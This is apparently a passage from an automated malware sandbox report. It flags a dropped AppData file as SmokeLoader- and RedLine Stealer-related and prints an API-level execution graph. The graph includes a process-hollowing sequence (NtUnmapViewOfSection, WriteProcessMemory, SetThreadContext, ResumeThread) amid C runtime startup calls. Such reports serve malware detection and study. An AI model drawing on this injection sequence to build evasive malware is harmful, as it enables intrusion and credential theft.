                      Commandline:C:\Windows\Explorer.EXE
                      Imagebase:0x7ff69fe90000
                      File size:3933184 bytes
                      MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000B.00000000.384294953.00000000057B1000.00000020.80000000.00040000.00000000.sdmp, Author: unknown
                      Reputation:high

                      Target ID:12
                      Start time:23:15:11
                      Start date:29/09/2022
                      Path:C:\Users\user\AppData\Roaming\sifdvgf
                      Wow64 process (32bit):true
                      Commandline:C:\Users\user\AppData\Roaming\sifdvgf
                      Imagebase:0x400000
                      File size:297472 bytes
                      MD5 hash:44F5530502DB25E5E66C15260EC4D25C
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000C.00000002.515896038.00000000006EB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      • Detection: 72%, ReversingLabs
                      Reputation:low

                      Reset < >

                        Execution Graph

                        Execution Coverage:7%
                        Dynamic/Decrypted Code Coverage:1.5%
                        Signature Coverage:6.5%
                        Total number of Nodes:1758
                        Total number of Limit Nodes:31
                        execution_graph 8994 520000 8997 520630 8994->8997 8996 520005 8998 52064c 8997->8998 9000 521577 8998->9000 9003 5205b0 9000->9003 9006 5205dc 9003->9006 9004 5205e2 GetFileAttributesA 9004->9006 9005 52061e 9006->9004 9006->9005 9008 520420 9006->9008 9009 5204f3 9008->9009 9010 5204fa 9009->9010 9011 5204ff CreateWindowExA 9009->9011 9010->9006 9011->9010 9012 520540 PostMessageA 9011->9012 9013 52055f 9012->9013 9013->9010 9015 520110 VirtualAlloc GetModuleFileNameA 9013->9015 9016 520414 9015->9016 9017 52017d CreateProcessA 9015->9017 9016->9013 9017->9016 9019 52025f VirtualFree VirtualAlloc GetThreadContext 9017->9019 9019->9016 9020 5202a9 ReadProcessMemory 9019->9020 9021 5202e5 VirtualAllocEx NtWriteVirtualMemory 9020->9021 9022 5202d5 NtUnmapViewOfSection 9020->9022 9023 52033b 9021->9023 9022->9021 9024 520350 NtWriteVirtualMemory 9023->9024 9025 52039d WriteProcessMemory SetThreadContext ResumeThread 9023->9025 9024->9023 9026 5203fb ExitProcess 9025->9026 9028 409d17 9031 409ca5 TlsGetValue 9028->9031 9032 409cbd 9031->9032 9033 409cde GetModuleHandleW 9031->9033 9032->9033 9034 409cc7 TlsGetValue 9032->9034 9035 409cf9 GetProcAddress 9033->9035 9036 409cee 9033->9036 9038 409cd2 9034->9038 9042 409cd6 9035->9042 9043 40cc73 9036->9043 9038->9033 9038->9042 9040 409d11 9041 409d09 RtlEncodePointer 9041->9040 9042->9040 9042->9041 9044 40cc7e Sleep GetModuleHandleW 9043->9044 9045 409cf4 9044->9045 9046 40cc9c 9044->9046 9045->9035 9045->9040 9046->9044 9046->9045 9047 4075bb 9093 40c128 9047->9093 9049 4075c7 GetStartupInfoA 9050 4075ea 9049->9050 9094 40d805 HeapCreate 9050->9094 9053 40763a 9096 40a0b5 GetModuleHandleW 9053->9096 9057 40764b __RTC_Initialize 9130 40be9f 9057->9130 9058 407592 _fast_error_exit 68 API calls 9058->9057 9060 407659 9061 407665 GetCommandLineA 9060->9061 9210 40cca3 9060->9210 9145 40d682 9061->9145 9067 40767f 9068 407683 9067->9068 9069 40768b 9067->9069 9070 40cca3 __amsg_exit 68 API calls 9068->9070 9170 40d34f 9069->9170 9072 40768a 9070->9072 9072->9069 9074 407694 9077 40cca3 __amsg_exit 68 API calls 9074->9077 9075 40769c 9185 40cd62 9075->9185 9078 40769b 9077->9078 9078->9075 9079 4076a2 9080 4076a7 9079->9080 9081 4076ae 9079->9081 9082 40cca3 __amsg_exit 68 API calls 9080->9082 9191 40d2f0 9081->9191 9084 4076ad 9082->9084 9084->9081 9085 4076b3 9086 4076b8 9085->9086 9197 406429 9085->9197 9086->9085 9089 4076dc 9231 40cf3f 9089->9231 9092 4076e1 _fprintf 9093->9049 9095 40762e 9094->9095 9095->9053 9202 407592 9095->9202 9097 40a0d0 9096->9097 9098 40a0c9 9096->9098 9100 40a238 9097->9100 9101 40a0da GetProcAddress GetProcAddress GetProcAddress GetProcAddress 9097->9101 9099 40cc73 __crt_waiting_on_module_handle 2 API calls 9098->9099 9102 40a0cf 9099->9102 9279 409dcf 9100->9279 9103 40a123 TlsAlloc 9101->9103 9102->9097 9106 407640 9103->9106 9107 40a171 TlsSetValue 9103->9107 9106->9057 9106->9058 9107->9106 9108 40a182 9107->9108 9234 40cf5d 9108->9234 9111 409ca5 __encode_pointer 7 API calls 9112 40a192 9111->9112 9113 409ca5 __encode_pointer 7 API calls 9112->9113 9114 40a1a2 9113->9114 9115 409ca5 __encode_pointer 7 API calls 9114->9115 9116 40a1b2 9115->9116 9117 409ca5 __encode_pointer 7 API calls 9116->9117 9118 40a1c2 9117->9118 9241 40d9d1 9118->9241 9125 409d20 __decode_pointer 6 API calls 9126 40a216 9125->9126 9126->9100 9127 40a21d 9126->9127 9261 409e0c 9127->9261 9129 40a225 GetCurrentThreadId 9129->9106 9612 40c128 9130->9612 9132 40beab GetStartupInfoA 9133 410529 __calloc_crt 68 API calls 9132->9133 9140 40becc 9133->9140 9134 40c0ea _fprintf 9134->9060 9135 40c067 GetStdHandle 9144 40c031 9135->9144 9136 40c0cc SetHandleCount 9136->9134 9137 410529 __calloc_crt 68 API calls 9137->9140 9138 40c079 GetFileType 9138->9144 9139 40bfb4 9139->9134 9141 40bfdd GetFileType 9139->9141 9143 410e14 __mtinitlocknum InitializeCriticalSectionAndSpinCount 9139->9143 9139->9144 9140->9134 9140->9137 9140->9139 9140->9144 9141->9139 9142 410e14 __mtinitlocknum InitializeCriticalSectionAndSpinCount 9142->9144 9143->9139 9144->9134 9144->9135 9144->9136 9144->9138 9144->9142 9146 40d6a0 GetEnvironmentStringsW 9145->9146 9147 40d6bf 9145->9147 9148 40d6b4 GetLastError 9146->9148 9149 40d6a8 9146->9149 9147->9149 9150 40d758 9147->9150 9148->9147 9151 40d6db GetEnvironmentStringsW 9149->9151 9154 40d6ea WideCharToMultiByte 9149->9154 9152 40d761 GetEnvironmentStrings 9150->9152 9157 407675 9150->9157 9151->9154 9151->9157 9152->9157 9158 40d771 9152->9158 9155 40d74d FreeEnvironmentStringsW 9154->9155 9156 40d71e 9154->9156 9155->9157 9160 4104e4 __malloc_crt 68 API calls 9156->9160 9217 40d5c7 9157->9217 9158->9158 9159 4104e4 __malloc_crt 68 API calls 9158->9159 9161 40d78b 9159->9161 9162 40d724 9160->9162 9163 40d792 FreeEnvironmentStringsA 9161->9163 9164 40d79e ___crtGetEnvironmentStringsA 9161->9164 9162->9155 9165 40d72c WideCharToMultiByte 9162->9165 9163->9157 9168 40d7a8 FreeEnvironmentStringsA 9164->9168 9166 40d746 9165->9166 9167 40d73e 9165->9167 9166->9155 9169 4079a1 ___endstdio 68 API calls 9167->9169 9168->9157 9169->9166 9171 40d358 9170->9171 9174 40d35d _strlen 9170->9174 9613 40f192 9171->9613 9173 407690 9173->9074 9173->9075 9174->9173 9175 410529 __calloc_crt 68 API calls 9174->9175 9180 40d392 _strlen 9175->9180 9176 40d3f0 9177 4079a1 ___endstdio 68 API calls 9176->9177 9177->9173 9178 410529 __calloc_crt 68 API calls 9178->9180 9179 40d416 9181 4079a1 ___endstdio 68 API calls 9179->9181 9180->9173 9180->9176 9180->9178 9180->9179 9182 407820 _strcpy_s 68 API calls 9180->9182 9183 40d3d7 9180->9183 9181->9173 9182->9180 9183->9180 9184 406c16 __invoke_watson 10 API calls 9183->9184 9184->9183 9187 40cd70 __IsNonwritableInCurrentImage 9185->9187 10018 409525 9187->10018 9188 40cd8e __initterm_e 9190 40cdad __IsNonwritableInCurrentImage __initterm 9188->9190 10022 409c4f 9188->10022 9190->9079 9192 40d2fe 9191->9192 9195 40d303 9191->9195 9193 40f192 ___initmbctable 112 API calls 9192->9193 9193->9195 9194 40d33f 9194->9085 9195->9194 10122 412e43 9195->10122 10128 405a6b 9197->10128 9199 4064b9 9200 4064cc 7 API calls 9199->9200 9201 406514 9199->9201 9200->9199 9201->9089 9228 40cf13 9201->9228 9203 4075a0 9202->9203 9204 4075a5 9202->9204 9205 40d156 __FF_MSGBANNER 68 API calls 9203->9205 9206 40cfab __NMSG_WRITE 68 API calls 9204->9206 9205->9204 9207 4075ad 9206->9207 9208 40ccf7 _doexit 3 API calls 9207->9208 9209 4075b7 9208->9209 9209->9053 9211 40d156 __FF_MSGBANNER 68 API calls 9210->9211 9212 40ccad 9211->9212 9213 40cfab __NMSG_WRITE 68 API calls 9212->9213 9214 40ccb5 9213->9214 9215 409d20 __decode_pointer 6 API calls 9214->9215 9216 407664 9215->9216 9216->9061 9218 40d5e1 GetModuleFileNameA 9217->9218 9219 40d5dc 9217->9219 9221 40d608 9218->9221 9220 40f192 ___initmbctable 112 API calls 9219->9220 9220->9218 11025 40d42d 9221->11025 9223 40d664 9223->9067 9225 4104e4 __malloc_crt 68 API calls 9226 40d64a 9225->9226 9226->9223 9227 40d42d _parse_cmdline 78 API calls 9226->9227 9227->9223 11031 40cde7 9228->11031 9230 40cf24 9230->9089 9232 40cde7 _doexit 68 API calls 9231->9232 9233 40cf4a 9232->9233 9233->9092 9290 409d17 9234->9290 9236 40cf65 __init_pointers __initp_misc_winsig 9293 40af7f 9236->9293 9239 409ca5 __encode_pointer 7 API calls 9240 40a187 9239->9240 9240->9111 9242 40d9dc 9241->9242 9244 40a1cf 9242->9244 9296 410e14 9242->9296 9244->9100 9245 409d20 TlsGetValue 9244->9245 9246 409d38 9245->9246 9247 409d59 GetModuleHandleW 9245->9247 9246->9247 9250 409d42 TlsGetValue 9246->9250 9248 409d74 GetProcAddress 9247->9248 9249 409d69 9247->9249 9252 409d51 9248->9252 9251 40cc73 __crt_waiting_on_module_handle 2 API calls 9249->9251 9254 409d4d 9250->9254 9253 409d6f 9251->9253 9252->9100 9255 410529 9252->9255 9253->9248 9253->9252 9254->9247 9254->9252 9257 410532 9255->9257 9258 40a1fc 9257->9258 9259 410550 Sleep 9257->9259 9301 415809 9257->9301 9258->9100 9258->9125 9260 410565 9259->9260 9260->9257 9260->9258 9591 40c128 9261->9591 9263 409e18 GetModuleHandleW 9264 409e28 9263->9264 9265 409e2e 9263->9265 9266 40cc73 __crt_waiting_on_module_handle 2 API calls 9264->9266 9267 409e46 GetProcAddress GetProcAddress 9265->9267 9268 409e6a 9265->9268 9266->9265 9267->9268 9269 40db4d __lock 64 API calls 9268->9269 9270 409e89 InterlockedIncrement 9269->9270 9592 409ee1 9270->9592 9273 40db4d __lock 64 API calls 9274 409eaa 9273->9274 9595 40f2f9 InterlockedIncrement 9274->9595 9276 409ec8 9607 409eea 9276->9607 9278 409ed5 _fprintf 9278->9129 9280 409dd9 9279->9280 9283 409de5 9279->9283 9281 409d20 __decode_pointer 6 API calls 9280->9281 9281->9283 9282 409df9 TlsFree 9284 409e07 9282->9284 9283->9282 9283->9284 9285 40da38 DeleteCriticalSection 9284->9285 9286 40da50 9284->9286 9287 4079a1 ___endstdio 68 API calls 9285->9287 9288 40da62 DeleteCriticalSection 9286->9288 9289 40da70 9286->9289 9287->9284 9288->9286 9289->9106 9291 409ca5 __encode_pointer 7 API calls 9290->9291 9292 409d1e 9291->9292 9292->9236 9294 409ca5 __encode_pointer 7 API calls 9293->9294 9295 40af89 9294->9295 9295->9239 9300 40c128 9296->9300 9298 410e20 InitializeCriticalSectionAndSpinCount 9299 410e64 _fprintf 9298->9299 9299->9242 9300->9298 9302 415815 _fprintf 9301->9302 9303 41584c _memset 9302->9303 9304 41582d 9302->9304 9308 4158be RtlAllocateHeap 9303->9308 9309 415842 _fprintf 9303->9309 9320 40db4d 9303->9320 9327 40e35f 9303->9327 9333 415905 9303->9333 9336 409c75 9303->9336 9314 407f57 9304->9314 9308->9303 9309->9257 9339 409ef3 GetLastError 9314->9339 9316 407f5c 9317 406d3e 9316->9317 9318 409d20 __decode_pointer 6 API calls 9317->9318 9319 406d4e __invoke_watson 9318->9319 9321 40db62 9320->9321 9322 40db75 EnterCriticalSection 9320->9322 9386 40da8a 9321->9386 9322->9303 9324 40db68 9324->9322 9325 40cca3 __amsg_exit 67 API calls 9324->9325 9326 40db74 9325->9326 9326->9322 9329 40e38d 9327->9329 9328 40e426 9332 40e42f 9328->9332 9586 40df76 9328->9586 9329->9328 9329->9332 9579 40dec6 9329->9579 9332->9303 9590 40da73 LeaveCriticalSection 9333->9590 9335 41590c 9335->9303 9337 409d20 __decode_pointer 6 API calls 9336->9337 9338 409c85 9337->9338 9338->9303 9353 409d9b TlsGetValue 9339->9353 9342 409f60 SetLastError 9342->9316 9343 410529 __calloc_crt 65 API calls 9344 409f1e 9343->9344 9344->9342 9345 409d20 __decode_pointer 6 API calls 9344->9345 9346 409f38 9345->9346 9347 409f57 9346->9347 9348 409f3f 9346->9348 9358 4079a1 9347->9358 9349 409e0c __mtinit 65 API calls 9348->9349 9351 409f47 GetCurrentThreadId 9349->9351 9351->9342 9352 409f5d 9352->9342 9354 409db0 9353->9354 9355 409dcb 9353->9355 9356 409d20 __decode_pointer 6 API calls 9354->9356 9355->9342 9355->9343 9357 409dbb TlsSetValue 9356->9357 9357->9355 9360 4079ad _fprintf 9358->9360 9359 4079ec 9361 407a26 __dosmaperr _fprintf 9359->9361 9362 407a01 HeapFree 9359->9362 9360->9359 9360->9361 9363 40db4d __lock 66 API calls 9360->9363 9361->9352 9362->9361 9364 407a13 9362->9364 9367 4079c4 ___sbh_find_block 9363->9367 9365 407f57 __dosmaperr 66 API calls 9364->9365 9366 407a18 GetLastError 9365->9366 9366->9361 9370 4079de 9367->9370 9371 40dbb0 9367->9371 9378 4079f7 9370->9378 9372 40de91 9371->9372 9373 40dbef 9371->9373 9372->9370 9373->9372 9374 40dddb VirtualFree 9373->9374 9375 40de3f 9374->9375 9375->9372 9376 40de4e VirtualFree HeapFree 9375->9376 9381 407fa0 9376->9381 9385 40da73 LeaveCriticalSection 9378->9385 9380 4079fe 9380->9359 9382 407fb8 9381->9382 9383 407fe7 9382->9383 9384 407fdf __VEC_memcpy 9382->9384 9383->9372 9384->9383 9385->9380 9387 40da96 _fprintf 9386->9387 9389 40dabc 9387->9389 9412 40d156 9387->9412 9394 40dacc _fprintf 9389->9394 9458 4104e4 9389->9458 9394->9324 9396 40daed 9398 40db4d __lock 68 API calls 9396->9398 9397 40dade 9400 407f57 __dosmaperr 68 API calls 9397->9400 9401 40daf4 9398->9401 9400->9394 9402 40db28 9401->9402 9403 40dafc 9401->9403 9405 4079a1 ___endstdio 68 API calls 9402->9405 9404 410e14 __mtinitlocknum InitializeCriticalSectionAndSpinCount 9403->9404 9406 40db07 9404->9406 9407 40db19 9405->9407 9406->9407 9409 4079a1 ___endstdio 68 API calls 9406->9409 9464 40db44 9407->9464 9410 40db13 9409->9410 9411 407f57 __dosmaperr 68 API calls 9410->9411 9411->9407 9467 412da5 9412->9467 9415 40d16a 9417 40cfab __NMSG_WRITE 68 API calls 9415->9417 9420 40d18c 9415->9420 9416 412da5 __set_error_mode 68 API calls 9416->9415 9418 40d182 9417->9418 9419 40cfab __NMSG_WRITE 68 API calls 9418->9419 9419->9420 9421 40cfab 9420->9421 9422 40cfbf 9421->9422 9423 412da5 __set_error_mode 65 API calls 9422->9423 9454 40d11a 9422->9454 9424 40cfe1 9423->9424 9425 40d11f GetStdHandle 9424->9425 9427 412da5 __set_error_mode 65 API calls 9424->9427 9426 40d12d _strlen 9425->9426 9425->9454 9430 40d146 WriteFile 9426->9430 9426->9454 9428 40cff2 9427->9428 9428->9425 9429 40d004 9428->9429 9429->9454 9473 407820 9429->9473 9430->9454 9433 40d03a GetModuleFileNameA 9435 40d058 9433->9435 9440 40d07b _strlen 9433->9440 9437 407820 _strcpy_s 65 API calls 9435->9437 9438 40d068 9437->9438 9438->9440 9441 406c16 __invoke_watson 10 API calls 9438->9441 9439 40d0be 9498 412c7c 9439->9498 9440->9439 9489 412cf0 9440->9489 9441->9440 9446 40d0e2 9448 412c7c _strcat_s 65 API calls 9446->9448 9447 406c16 __invoke_watson 10 API calls 9447->9446 9450 40d0f6 9448->9450 9449 406c16 __invoke_watson 10 API calls 9449->9439 9451 40d107 9450->9451 9453 406c16 __invoke_watson 10 API calls 9450->9453 9507 412b13 9451->9507 9453->9451 9455 40ccf7 9454->9455 9545 40cccc GetModuleHandleW 9455->9545 9460 4104ed 9458->9460 9461 40dad7 9460->9461 9462 410504 Sleep 9460->9462 9548 4078d7 9460->9548 9461->9396 9461->9397 9463 410519 9462->9463 9463->9460 9463->9461 9578 40da73 LeaveCriticalSection 9464->9578 9466 40db4b 9466->9394 9468 412db4 9467->9468 9469 40d15d 9468->9469 9470 407f57 __dosmaperr 68 API calls 9468->9470 9469->9415 9469->9416 9471 412dd7 9470->9471 9472 406d3e __strnicmp_l 6 API calls 9471->9472 9472->9469 9474 407831 9473->9474 9475 407838 9473->9475 9474->9475 9477 40785e 9474->9477 9476 407f57 __dosmaperr 68 API calls 9475->9476 9481 40783d 9476->9481 9479 40784c 9477->9479 9480 407f57 __dosmaperr 68 API calls 9477->9480 9478 406d3e __strnicmp_l 6 API calls 9478->9479 9479->9433 9482 406c16 9479->9482 9480->9481 9481->9478 9534 407b30 9482->9534 9484 406c43 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9485 406d1f GetCurrentProcess TerminateProcess 9484->9485 9487 406d13 __invoke_watson 9484->9487 9536 4077db 9485->9536 9487->9485 9488 406d3c 9488->9433 9493 412d02 9489->9493 9490 412d06 9491 40d0ab 9490->9491 9492 407f57 __dosmaperr 68 API calls 9490->9492 9491->9439 9491->9449 9494 412d22 9492->9494 9493->9490 9493->9491 9496 412d4c 9493->9496 9495 406d3e __strnicmp_l 6 API calls 9494->9495 9495->9491 9496->9491 9497 407f57 __dosmaperr 68 API calls 9496->9497 9497->9494 9499 412c94 9498->9499 9501 412c8d 9498->9501 9500 407f57 __dosmaperr 68 API calls 9499->9500 9506 412c99 9500->9506 9501->9499 9503 412cc8 9501->9503 9502 406d3e __strnicmp_l 6 API calls 9504 40d0d1 9502->9504 9503->9504 9505 407f57 __dosmaperr 68 API calls 9503->9505 9504->9446 9504->9447 9505->9506 9506->9502 9508 409d17 ___crtMessageBoxW 7 API calls 9507->9508 9509 412b23 9508->9509 9510 412b36 LoadLibraryA 9509->9510 9513 412bbe 9509->9513 9511 412c60 9510->9511 9512 412b4b GetProcAddress 9510->9512 9511->9454 9512->9511 9514 412b61 9512->9514 9516 409d20 __decode_pointer 6 API calls 9513->9516 9531 412be8 9513->9531 9517 409ca5 __encode_pointer 7 API calls 9514->9517 9515 409d20 __decode_pointer 6 API calls 9525 412c2b 9515->9525 9519 412bdb 9516->9519 9520 412b67 GetProcAddress 9517->9520 9518 409d20 __decode_pointer 6 API calls 9518->9511 9521 409d20 __decode_pointer 6 API calls 9519->9521 9522 409ca5 __encode_pointer 7 API calls 9520->9522 9521->9531 9523 412b7c GetProcAddress 9522->9523 9524 409ca5 __encode_pointer 7 API calls 9523->9524 9526 412b91 GetProcAddress 9524->9526 9528 409d20 __decode_pointer 6 API calls 9525->9528 9530 412c13 9525->9530 9527 409ca5 __encode_pointer 7 API calls 9526->9527 9529 412ba6 9527->9529 9528->9530 9529->9513 9532 412bb0 GetProcAddress 9529->9532 9530->9518 9531->9515 9531->9530 9533 409ca5 __encode_pointer 7 API calls 9532->9533 9533->9513 9535 407b3c __VEC_memzero 9534->9535 9535->9484 9537 4077e3 9536->9537 9538 4077e5 IsDebuggerPresent 9536->9538 9537->9488 9544 409c9d 9538->9544 9541 40d998 SetUnhandledExceptionFilter UnhandledExceptionFilter 9542 40d9b5 __invoke_watson 9541->9542 9543 40d9bd GetCurrentProcess TerminateProcess 9541->9543 9542->9543 9543->9488 9544->9541 9546 40cce0 GetProcAddress 9545->9546 9547 40ccf0 ExitProcess 9545->9547 9546->9547 9549 40798a 9548->9549 9559 4078e9 9548->9559 9550 409c75 _malloc 6 API calls 9549->9550 9551 407990 9550->9551 9553 407f57 __dosmaperr 67 API calls 9551->9553 9552 40d156 __FF_MSGBANNER 67 API calls 9557 4078fa 9552->9557 9565 407982 9553->9565 9555 40cfab __NMSG_WRITE 67 API calls 9555->9557 9556 407946 RtlAllocateHeap 9556->9559 9557->9552 9557->9555 9558 40ccf7 _doexit 3 API calls 9557->9558 9557->9559 9558->9557 9559->9556 9559->9557 9560 407976 9559->9560 9562 409c75 _malloc 6 API calls 9559->9562 9563 40797b 9559->9563 9559->9565 9566 407888 9559->9566 9561 407f57 __dosmaperr 67 API calls 9560->9561 9561->9563 9562->9559 9564 407f57 __dosmaperr 67 API calls 9563->9564 9564->9565 9565->9460 9567 407894 _fprintf 9566->9567 9568 4078c5 _fprintf 9567->9568 9569 40db4d __lock 68 API calls 9567->9569 9568->9559 9570 4078aa 9569->9570 9571 40e35f ___sbh_alloc_block 5 API calls 9570->9571 9572 4078b5 9571->9572 9574 4078ce 9572->9574 9577 40da73 LeaveCriticalSection 9574->9577 9576 4078d5 9576->9568 9577->9576 9578->9466 9580 40ded9 HeapReAlloc 9579->9580 9581 40df0d HeapAlloc 9579->9581 9583 40def7 9580->9583 9584 40defb 9580->9584 9582 40df30 VirtualAlloc 9581->9582 9581->9583 9582->9583 9585 40df4a HeapFree 9582->9585 9583->9328 9584->9581 9585->9583 9587 40df8d VirtualAlloc 9586->9587 9589 40dfd4 9587->9589 9589->9332 9590->9335 9591->9263 9610 40da73 LeaveCriticalSection 9592->9610 9594 409ea3 9594->9273 9596 40f317 InterlockedIncrement 9595->9596 9597 40f31a 9595->9597 9596->9597 9598 40f324 InterlockedIncrement 9597->9598 9599 40f327 9597->9599 9598->9599 9600 40f331 InterlockedIncrement 9599->9600 9601 40f334 9599->9601 9600->9601 9602 40f341 9601->9602 9603 40f33e InterlockedIncrement 9601->9603 9604 40f35a InterlockedIncrement 9602->9604 9605 40f36a InterlockedIncrement 9602->9605 9606 40f375 InterlockedIncrement 9602->9606 9603->9602 9604->9602 9605->9602 9606->9276 9611 40da73 LeaveCriticalSection 9607->9611 9609 409ef1 9609->9278 9610->9594 9611->9609 9612->9132 9614 40f19b 9613->9614 9615 40f1a2 9613->9615 9617 40eff8 9614->9617 9615->9174 9618 40f004 _fprintf 9617->9618 9648 409f6c 9618->9648 9622 40f017 9669 40ed97 9622->9669 9625 4104e4 __malloc_crt 68 API calls 9626 40f038 9625->9626 9627 40f157 _fprintf 9626->9627 9676 40ee13 9626->9676 9627->9615 9630 40f164 9630->9627 9635 40f177 9630->9635 9638 4079a1 ___endstdio 68 API calls 9630->9638 9631 40f068 InterlockedDecrement 9632 40f078 9631->9632 9633 40f089 InterlockedIncrement 9631->9633 9632->9633 9637 4079a1 ___endstdio 68 API calls 9632->9637 9633->9627 9634 40f09f 9633->9634 9634->9627 9640 40db4d __lock 68 API calls 9634->9640 9636 407f57 __dosmaperr 68 API calls 9635->9636 9636->9627 9639 40f088 9637->9639 9638->9635 9639->9633 9641 40f0b3 InterlockedDecrement 9640->9641 9643 40f142 InterlockedIncrement 9641->9643 9644 40f12f 9641->9644 9686 40f159 9643->9686 9644->9643 9646 4079a1 ___endstdio 68 API calls 9644->9646 9647 40f141 9646->9647 9647->9643 9649 409ef3 __getptd_noexit 68 API calls 9648->9649 9650 409f74 9649->9650 9651 409f81 9650->9651 9652 40cca3 __amsg_exit 68 API calls 9650->9652 9653 40ecf3 9651->9653 9652->9651 9654 40ecff _fprintf 9653->9654 9655 409f6c __getptd 68 API calls 9654->9655 9656 40ed04 9655->9656 9657 40db4d __lock 68 API calls 9656->9657 9661 40ed16 9656->9661 9658 40ed34 9657->9658 9659 40ed7d 9658->9659 9662 40ed65 InterlockedIncrement 9658->9662 9663 40ed4b InterlockedDecrement 9658->9663 9689 40ed8e 9659->9689 9660 40ed24 _fprintf 9660->9622 9661->9660 9665 40cca3 __amsg_exit 68 API calls 9661->9665 9662->9659 9663->9662 9666 40ed56 9663->9666 9665->9660 9666->9662 9667 4079a1 ___endstdio 68 API calls 9666->9667 9668 40ed64 9667->9668 9668->9662 9693 4089c3 9669->9693 9672 40edd4 9674 40edc6 9672->9674 9675 40edd9 GetACP 9672->9675 9673 40edb6 GetOEMCP 9673->9674 9674->9625 9674->9627 9675->9674 9677 40ed97 getSystemCP 80 API calls 9676->9677 9678 40ee33 9677->9678 9679 40ee3e setSBCS 9678->9679 9682 40ee82 IsValidCodePage 9678->9682 9685 40eea7 _memset __setmbcp_nolock 9678->9685 9680 4077db __invoke_watson 5 API calls 9679->9680 9681 40eff6 9680->9681 9681->9630 9681->9631 9682->9679 9683 40ee94 GetCPInfo 9682->9683 9683->9679 9683->9685 9884 40eb60 GetCPInfo 9685->9884 10017 40da73 LeaveCriticalSection 9686->10017 9688 40f160 9688->9627 9692 40da73 LeaveCriticalSection 9689->9692 9691 40ed95 9691->9661 9692->9691 9694 4089d6 9693->9694 9700 408a23 9693->9700 9695 409f6c __getptd 68 API calls 9694->9695 9696 4089db 9695->9696 9697 408a03 9696->9697 9701 40f45f 9696->9701 9699 40ecf3 _LocaleUpdate::_LocaleUpdate 70 API calls 9697->9699 9697->9700 9699->9700 9700->9672 9700->9673 9702 40f46b _fprintf 9701->9702 9703 409f6c __getptd 68 API calls 9702->9703 9704 40f470 9703->9704 9705 40f49e 9704->9705 9707 40f482 9704->9707 9706 40db4d __lock 68 API calls 9705->9706 9708 40f4a5 9706->9708 9709 409f6c __getptd 68 API calls 9707->9709 9716 40f421 9708->9716 9711 40f487 9709->9711 9713 40f495 _fprintf 9711->9713 9715 40cca3 __amsg_exit 68 API calls 9711->9715 9713->9697 9715->9713 9717 40f425 9716->9717 9718 40f457 9716->9718 9717->9718 9719 40f2f9 ___addlocaleref 8 API calls 9717->9719 9724 40f4c9 9718->9724 9720 40f438 9719->9720 9720->9718 9727 40f388 9720->9727 9883 40da73 LeaveCriticalSection 9724->9883 9726 40f4d0 9726->9711 9728 40f399 InterlockedDecrement 9727->9728 9729 40f41c 9727->9729 9730 40f3b1 9728->9730 9731 40f3ae InterlockedDecrement 9728->9731 9729->9718 9741 40f1b0 9729->9741 9732 40f3bb InterlockedDecrement 9730->9732 9733 40f3be 9730->9733 9731->9730 9732->9733 9734 40f3c8 InterlockedDecrement 9733->9734 9735 40f3cb 9733->9735 9734->9735 9736 40f3d5 InterlockedDecrement 9735->9736 9738 40f3d8 9735->9738 9736->9738 9737 40f3f1 InterlockedDecrement 9737->9738 9738->9737 9739 40f401 InterlockedDecrement 9738->9739 9740 40f40c InterlockedDecrement 9738->9740 9739->9738 9740->9729 9742 40f1c7 9741->9742 9743 40f234 9741->9743 9742->9743 9747 40f1fb 9742->9747 9756 4079a1 ___endstdio 68 API calls 9742->9756 9744 40f281 9743->9744 9745 4079a1 ___endstdio 68 API calls 9743->9745 9752 40f2a8 9744->9752 9795 4134b0 9744->9795 9746 40f255 9745->9746 9749 4079a1 ___endstdio 68 API calls 9746->9749 9750 40f21c 9747->9750 9759 4079a1 ___endstdio 68 API calls 9747->9759 9753 40f268 9749->9753 9754 4079a1 ___endstdio 68 API calls 9750->9754 9755 40f2ed 9752->9755 9765 4079a1 68 API calls ___endstdio 9752->9765 9758 4079a1 ___endstdio 68 API calls 9753->9758 9760 40f229 9754->9760 9761 4079a1 ___endstdio 68 API calls 9755->9761 9762 40f1f0 9756->9762 9757 4079a1 ___endstdio 68 API calls 9757->9752 9763 40f276 9758->9763 9764 40f211 9759->9764 9766 4079a1 ___endstdio 68 API calls 9760->9766 9767 40f2f3 9761->9767 9771 41368a 9762->9771 9769 4079a1 ___endstdio 68 API calls 9763->9769 9787 413645 9764->9787 9765->9752 9766->9743 9767->9718 9769->9744 9772 413697 9771->9772 9786 413714 9771->9786 9773 4136a8 9772->9773 9774 4079a1 ___endstdio 68 API calls 9772->9774 9775 4136ba 9773->9775 9777 4079a1 ___endstdio 68 API calls 9773->9777 9774->9773 9776 4136cc 9775->9776 9778 4079a1 ___endstdio 68 API calls 9775->9778 9779 4136de 9776->9779 9780 4079a1 ___endstdio 68 API calls 9776->9780 9777->9775 9778->9776 9781 4136f0 9779->9781 9782 4079a1 ___endstdio 68 API calls 9779->9782 9780->9779 9783 413702 9781->9783 9784 4079a1 ___endstdio 68 API calls 9781->9784 9782->9781 9785 4079a1 ___endstdio 68 API calls 9783->9785 9783->9786 9784->9783 9785->9786 9786->9747 9788 413686 9787->9788 9790 413652 9787->9790 9788->9750 9789 413662 9792 413674 9789->9792 9793 4079a1 ___endstdio 68 API calls 9789->9793 9790->9789 9791 4079a1 ___endstdio 68 API calls 9790->9791 9791->9789 9792->9788 9794 4079a1 ___endstdio 68 API calls 9792->9794 9793->9792 9794->9788 9796 4134c1 9795->9796 9797 40f2a1 9795->9797 9798 4079a1 ___endstdio 68 API calls 9796->9798 9797->9757 9799 4134c9 9798->9799 9800 4079a1 ___endstdio 68 API calls 9799->9800 9801 4134d1 9800->9801 9802 4079a1 ___endstdio 68 API calls 9801->9802 9803 4134d9 9802->9803 9804 4079a1 ___endstdio 68 API calls 9803->9804 9805 4134e1 9804->9805 9806 4079a1 ___endstdio 68 API calls 9805->9806 9807 4134e9 9806->9807 9808 4079a1 ___endstdio 68 API calls 